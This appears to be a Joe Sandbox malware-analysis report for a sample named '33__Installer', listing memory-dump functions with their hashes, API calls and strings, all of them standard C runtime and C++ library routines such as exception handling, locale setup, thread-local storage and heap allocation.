Opcode ID: 0c736c68679d63215ae1b76ab6bae350f8eb7a0f25796de6a5ca645e5e749590
Instruction ID: c248c2060dad9b756d49a3b4517b54aa84061b1db8eb34f3c35aca373b1ee524
Opcode Fuzzy Hash: 0c736c68679d63215ae1b76ab6bae350f8eb7a0f25796de6a5ca645e5e749590
Instruction Fuzzy Hash: 74917D70E00209CFDF54CFA9C9957EDBBF2AF88314F248529E458A7294EB749885CF85

Function 03CB1628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4105617953.0000000003CA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03CA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3ca0000_33__Installer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: e6d0bdc94e8beaf472476f7ff25621277d7c2424c3227616cfe6e9ccaf7db35d
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: 19F03932200208AFCF15CF49D851DAA77F9EF08220F0D4069FD09DB221E331EE209B90

Function 00C21720 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fb45be82188af8a46939ca6e24c00f0b6ec268c9134e186b086aeb6c8041f0b
Instruction ID: 76b01cb89fb010655e4dd9fb6166a72dd503b0ff14d8381b903c8afe17a59439
Opcode Fuzzy Hash: 6fb45be82188af8a46939ca6e24c00f0b6ec268c9134e186b086aeb6c8041f0b
Instruction Fuzzy Hash: BED012B1C0431CAB8F14EFED58410ADFBFCFA05210F80C2EED80CA3342D23112204685

Function 00C29F39 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00C2646E), ref: 00C29F41
__mtterm.LIBCMT ref: 00C29F4D

Part of subcall function 00C29C86: DecodePointer.KERNEL32(00000002,00C2A0AF,?,00C2646E), ref: 00C29C97
Part of subcall function 00C29C86: TlsFree.KERNEL32(00000002,00C2A0AF,?,00C2646E), ref: 00C29CB1
Part of subcall function 00C29C86: DeleteCriticalSection.KERNEL32(00000000,00000000,76EF5810,?,00C2A0AF,?,00C2646E), ref: 00C2BC84
Part of subcall function 00C29C86: _free.LIBCMT ref: 00C2BC87
Part of subcall function 00C29C86: DeleteCriticalSection.KERNEL32(00000002,76EF5810,?,00C2A0AF,?,00C2646E), ref: 00C2BCAE

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00C29F63
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00C29F70
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00C29F7D
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00C29F8A
TlsAlloc.KERNEL32(?,00C2646E), ref: 00C29FDA
TlsSetValue.KERNEL32(00000000,?,00C2646E), ref: 00C29FF5
__init_pointers.LIBCMT ref: 00C29FFF
EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A010
EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A01D
EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A02A
EncodePointer.KERNEL32(?,00C2646E), ref: 00C2A037
DecodePointer.KERNEL32(00C29E0A,?,00C2646E), ref: 00C2A058
__calloc_crt.LIBCMT ref: 00C2A06D
DecodePointer.KERNEL32(00000000,?,00C2646E), ref: 00C2A087
GetCurrentThreadId.KERNEL32 ref: 00C2A099

Strings

FlsFree, xrefs: 00C29F7F
FlsAlloc, xrefs: 00C29F5D
KERNEL32.DLL, xrefs: 00C29F3C
FlsGetValue, xrefs: 00C29F65
FlsSetValue, xrefs: 00C29F72

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: 338261cd0384b4c0ee77c060dddb9cfeb3e8d485738b63929eb933ed930cb8f7
Instruction ID: bc4c12a366dcb0e7a0e84717d8003cf8f1bd1d8c382c395d231e479b934991fc
Opcode Fuzzy Hash: 338261cd0384b4c0ee77c060dddb9cfeb3e8d485738b63929eb933ed930cb8f7
Instruction Fuzzy Hash: AF313C31D242209ADB19BBB5BD19B1DBBE0FB4A360B14093FE455D26F0DB718842DF52

Function 00C21500 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 64COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 00C21524

Part of subcall function 00C24F36: RaiseException.KERNEL32(?,?,00C215D7,?,?,?,?,?,00C215D7,?,00C3CBC4,00000000), ref: 00C24F78

std::exception::exception.LIBCMT ref: 00C21548
__CxxThrowException@8.LIBCMT ref: 00C21563
std::exception::exception.LIBCMT ref: 00C21582
__CxxThrowException@8.LIBCMT ref: 00C2159D
std::exception::exception.LIBCMT ref: 00C215B7
__CxxThrowException@8.LIBCMT ref: 00C215D2

Strings

ios_base::failbit set, xrefs: 00C2157B, 00C215AA
ios_base::eofbit set, xrefs: 00C215B0
ios_base::badbit set, xrefs: 00C21541, 00C21575

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Exception@8Throw$std::exception::exception$ExceptionRaise
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 4237746311-1866435925
Opcode ID: 19b7d998f9366bc81b1aabc35ace4f87e3f72b213990f808bef671b4ba74fc7b
Instruction ID: 440c11abe12901c3e8877cf0fa45d5a951c3c4e50e207524cdf7f8f53e31dfbd
Opcode Fuzzy Hash: 19b7d998f9366bc81b1aabc35ace4f87e3f72b213990f808bef671b4ba74fc7b
Instruction Fuzzy Hash: 2F2192B2820218ABCB04EFD8D542AEEB7F8AF94714F24C059F91577641DBB05B04CF62

Function 00C228B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C228D3
std::_Lockit::_Lockit.LIBCPMT ref: 00C228F6
std::bad_exception::bad_exception.LIBCMT ref: 00C2297A
__CxxThrowException@8.LIBCMT ref: 00C22988
std::_Lockit::_Lockit.LIBCPMT ref: 00C2299B
std::locale::facet::_Facet_Register.LIBCPMT ref: 00C229B5

Strings

bad cast, xrefs: 00C22972

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 8086e4e195fae476e7a835aaf9551783cb07612f0c5b935a4c9e2d113ee51be0
Instruction ID: 435761d009b6570237fe72e8cdb9f20cb2709b2f57f858b1fceb12043e6dd946
Opcode Fuzzy Hash: 8086e4e195fae476e7a835aaf9551783cb07612f0c5b935a4c9e2d113ee51be0
Instruction Fuzzy Hash: A131E731D10225AFCB14EF54E981BAE7774FF15720F00066DE926A7AE1DB30AE46CB91

Function 00C22230 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C22253
std::_Lockit::_Lockit.LIBCPMT ref: 00C22276
std::bad_exception::bad_exception.LIBCMT ref: 00C222FA
__CxxThrowException@8.LIBCMT ref: 00C22308
std::_Lockit::_Lockit.LIBCPMT ref: 00C2231B
std::locale::facet::_Facet_Register.LIBCPMT ref: 00C22335

Strings

bad cast, xrefs: 00C222F2

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: dccd939354505f9977194d0425e5db18de5ea85a09ab97c6d65e15fce5c9b341
Instruction ID: 841e2aed4ed81d26b1a575d881a4d986fd4dfc343e899badd4398eb687d78057
Opcode Fuzzy Hash: dccd939354505f9977194d0425e5db18de5ea85a09ab97c6d65e15fce5c9b341
Instruction Fuzzy Hash: 3131D235900264EBCB14DF54E981BAE7774EB15730F10066DF822A7AA1DB35AE02CBD1

Function 00C29CC3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00C3D4B8,00000008,00C29DCB,00000000,00000000,?,?,00C2AF44,00C24EA2,?,?,00C24762,?,?,00C21021), ref: 00C29CD4
__lock.LIBCMT ref: 00C29D08

Part of subcall function 00C2BD97: __mtinitlocknum.LIBCMT ref: 00C2BDAD
Part of subcall function 00C2BD97: __amsg_exit.LIBCMT ref: 00C2BDB9
Part of subcall function 00C2BD97: EnterCriticalSection.KERNEL32(00000000,00000000,?,00C29D0D,0000000D), ref: 00C2BDC1

InterlockedIncrement.KERNEL32(?), ref: 00C29D15
__lock.LIBCMT ref: 00C29D29
___addlocaleref.LIBCMT ref: 00C29D47

Strings

KERNEL32.DLL, xrefs: 00C29CCF

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: c735385640457c8f815c26c2a3c4125bbb72084ae86adacb3d7760617607a2bc
Instruction ID: 034a65f2e4cc3a264e6cda1d2ac64427079bbc5b00a6ab1652becb3c440ab60d
Opcode Fuzzy Hash: c735385640457c8f815c26c2a3c4125bbb72084ae86adacb3d7760617607a2bc
Instruction Fuzzy Hash: 1D012D71814B10DFD720DF69E945749BBF0EF54320F10890EE49A96AA1CBB4AA44EF15

Function 00C283A3 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 00C283CB

Part of subcall function 00C2526C: __getptd.LIBCMT ref: 00C2527A
Part of subcall function 00C2526C: __getptd.LIBCMT ref: 00C25288

__getptd.LIBCMT ref: 00C283D5

Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00

__getptd.LIBCMT ref: 00C283E3
__getptd.LIBCMT ref: 00C283F1
__getptd.LIBCMT ref: 00C283FC
_CallCatchBlock2.LIBCMT ref: 00C28422

Part of subcall function 00C25311: __CallSettingFrame@12.LIBCMT ref: 00C2535D

Part of subcall function 00C284C9: __getptd.LIBCMT ref: 00C284D8
Part of subcall function 00C284C9: __getptd.LIBCMT ref: 00C284E6

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 399aa04776b09befb045d8584b21a1aaec86976540d9cc59056532279d47a868
Instruction ID: 21bd07aad59b0ca29b9bdc32e49226fe810f80584e4f561467346728d3136856
Opcode Fuzzy Hash: 399aa04776b09befb045d8584b21a1aaec86976540d9cc59056532279d47a868
Instruction Fuzzy Hash: 5111D7B1C00219DFDB00EFA4E986AAE7BB0FF04314F508469F815AB652DB789A15AF51

Function 00C2D804 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00C2D810

Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00

__amsg_exit.LIBCMT ref: 00C2D830
__lock.LIBCMT ref: 00C2D840
InterlockedDecrement.KERNEL32(?), ref: 00C2D85D
_free.LIBCMT ref: 00C2D870
InterlockedIncrement.KERNEL32(01981660), ref: 00C2D888

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 7bf7b360e9d78f7b3d30c1d880817e7cec0a7822be63a258920d5c3dbd74819f
Instruction ID: a405ff2c6fdd387d9ad8dc49a6b8b6e1b1319c40eace4c4ad14c9445f295431c
Opcode Fuzzy Hash: 7bf7b360e9d78f7b3d30c1d880817e7cec0a7822be63a258920d5c3dbd74819f
Instruction Fuzzy Hash: 9901F532D01731ABEB21AF78B44A78D7760BF14760F040018F826A7AD4CB749E81EBD2

Function 00C21D30 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00C21D55
std::exception::exception.LIBCMT ref: 00C21D8E

Part of subcall function 00C2476D: std::exception::_Copy_str.LIBCMT ref: 00C24788

__CxxThrowException@8.LIBCMT ref: 00C21DA3

Part of subcall function 00C24F36: RaiseException.KERNEL32(?,?,00C215D7,?,?,?,?,?,00C215D7,?,00C3CBC4,00000000), ref: 00C24F78

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00C21DAA

Strings

bad locale name, xrefs: 00C21D87

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8Locinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 73090415-1405518554
Opcode ID: f84618c11cdc7b56cf6dca1cebb0d79f9edca8b2daddaf7938dab24f58ec0db3
Instruction ID: 239ce9249720f1f25aede7d419506bb0ff5bd32b6f4cf7cd3d5a7e13ce12f1ad
Opcode Fuzzy Hash: f84618c11cdc7b56cf6dca1cebb0d79f9edca8b2daddaf7938dab24f58ec0db3
Instruction Fuzzy Hash: 3D1182B1904B94EFC721DF99D880A9EFBB8FB15700F40866EE45993A41C7745A08CBE5

Function 00C28750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00C28763

Part of subcall function 00C286BE: ___BuildCatchObjectHelper.LIBCMT ref: 00C286F4

_UnwindNestedFrames.LIBCMT ref: 00C2877A
___FrameUnwindToState.LIBCMT ref: 00C28788

Strings

csm, xrefs: 00C2875F, 00C28774, 00C28787, 00C287A5, 00C287B5
csm, xrefs: 00C28752

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: dd0ddcecc8c39347312c9988e3fa7ae7b2ad8c3dad9afd14d6f73e96c4cd7903
Instruction ID: da93cfb30fcd70f0e3151ae6ba7c56cec67b245003270fa2d4f568f089840431
Opcode Fuzzy Hash: dd0ddcecc8c39347312c9988e3fa7ae7b2ad8c3dad9afd14d6f73e96c4cd7903
Instruction Fuzzy Hash: A4014631002129BBDF22AF51EC85EAA7F6AFF08790F104010FC1814921DB3299B5EBA0

Function 00C2E448 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00C2E456

Part of subcall function 00C27CB1: __FF_MSGBANNER.LIBCMT ref: 00C27CCA
Part of subcall function 00C27CB1: __NMSG_WRITE.LIBCMT ref: 00C27CD1
Part of subcall function 00C27CB1: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00C26DD9,00000000,00000001,00000000,?,00C2BD22,00000018,00C3D5A8,0000000C,00C2BDB2), ref: 00C27CF6

_free.LIBCMT ref: 00C2E469

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: ea0449aa2056cf1685f300283561b8385da394829fbf8a3c4757add8962c0a65
Instruction ID: 2bb35edd56821c3557502f1318d69e5ad21d4bb713d559200e7807b83f9b952a
Opcode Fuzzy Hash: ea0449aa2056cf1685f300283561b8385da394829fbf8a3c4757add8962c0a65
Instruction Fuzzy Hash: 0D110632804331ABCB253BF5BC05B5E3B95EF443B0B218426F858ABE90DF34894197A1

Function 00C21DD0 Relevance: 7.6, APIs: 5, Instructions: 55COMMON

Download Yara Rule

APIs

std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00C21DF8

Part of subcall function 00C23E2C: _setlocale.LIBCMT ref: 00C23E3E

_free.LIBCMT ref: 00C21E0A

Part of subcall function 00C24E7C: HeapFree.KERNEL32(00000000,00000000,?,00C24762,?,?,00C21021), ref: 00C24E92
Part of subcall function 00C24E7C: GetLastError.KERNEL32(?,?,00C24762,?,?,00C21021), ref: 00C24EA4

_free.LIBCMT ref: 00C21E1D
_free.LIBCMT ref: 00C21E30
_free.LIBCMT ref: 00C21E43

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: _free$ErrorFreeHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 3515823920-0
Opcode ID: 6b5474d43025e7aebc8bff2b4e1ccaf888302f002724721b59419e6cdfccca36
Instruction ID: 54c4896d92e64e9d8e653d3b5bedf3a7c810d0deb97406a279b8608f585c24e1
Opcode Fuzzy Hash: 6b5474d43025e7aebc8bff2b4e1ccaf888302f002724721b59419e6cdfccca36
Instruction Fuzzy Hash: CD11C2F1900A50ABD620DF5DEC05A1BF7ECEF55B20F194B2AE426C3A40D775EA048A91

Function 00C2DF85 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00C2DF91

Part of subcall function 00C29DF0: __getptd_noexit.LIBCMT ref: 00C29DF3
Part of subcall function 00C29DF0: __amsg_exit.LIBCMT ref: 00C29E00

__getptd.LIBCMT ref: 00C2DFA8
__amsg_exit.LIBCMT ref: 00C2DFB6
__lock.LIBCMT ref: 00C2DFC6
__updatetlocinfoEx_nolock.LIBCMT ref: 00C2DFDA

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e00da2e365657be13984e89775775c3156bd254c932271ba134edd688088ac32
Instruction ID: f0f373c12dab08858aa85387e989b7899a2f972ff491f93771fd54fe98b10c7f
Opcode Fuzzy Hash: e00da2e365657be13984e89775775c3156bd254c932271ba134edd688088ac32
Instruction Fuzzy Hash: A5F090329447309FD621BBE8B903B4E77A0AF10720F504109F413A79C2CB745940AA9A

Function 00C22D70 Relevance: 6.2, APIs: 4, Instructions: 211COMMON

Download Yara Rule

APIs

_fgetc.LIBCMT ref: 00C22E09

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: _fgetc
String ID:
API String ID: 762172173-0
Opcode ID: 1324d2b10be6d79e8796775e16f446d67da5838a955e6d4d844af34f36f80971
Instruction ID: fe213fc5615931373873882f5f4a0d2d94326646e48827a887c804db60aa2690
Opcode Fuzzy Hash: 1324d2b10be6d79e8796775e16f446d67da5838a955e6d4d844af34f36f80971
Instruction Fuzzy Hash: 26717571901628AFCB24CF9CE980AAEF3F5FF49310F104A59E856A7B80D735AE05CB50

Function 00C340F5 Relevance: 6.1, APIs: 4, Instructions: 103COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00C34129
__isleadbyte_l.LIBCMT ref: 00C3415C
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,00000000,00000000,?,?,?), ref: 00C3418D
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,00000000,00000000,?,?,?), ref: 00C341FB

Memory Dump Source

Source File: 00000000.00000002.4104908533.0000000000C21000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C20000, based on PE: true

Associated: 00000000.00000002.4104888879.0000000000C20000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104929579.0000000000C39000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104944072.0000000000C3E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4104958779.0000000000C42000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c20000_33__Installer.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: f4f05524ab8f3411c0ddc7a51d4b8e5dda58374d60ba6452786d4b85754ec908
Instruction ID: 364a20f75b01daf2ff873118b95c1087dc288cb4030d15e33f1f93f78fa75fc3
Opcode Fuzzy Hash: f4f05524ab8f3411c0ddc7a51d4b8e5dda58374d60ba6452786d4b85754ec908
Instruction Fuzzy Hash: 7631AE31A20695EFDF28DF64CC81ABD3BB5EF11350F1485A9E4619B191D730EE80DB90

Function 00C29B4A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00C29B70

Part of subcall function 00C2999C: __fltout2.LIBCMT ref: 00C299C7

__cftog_l.LIBCMT ref: 00C29B96
__cftoe_l.LIBCMT ref: 00C29BC8

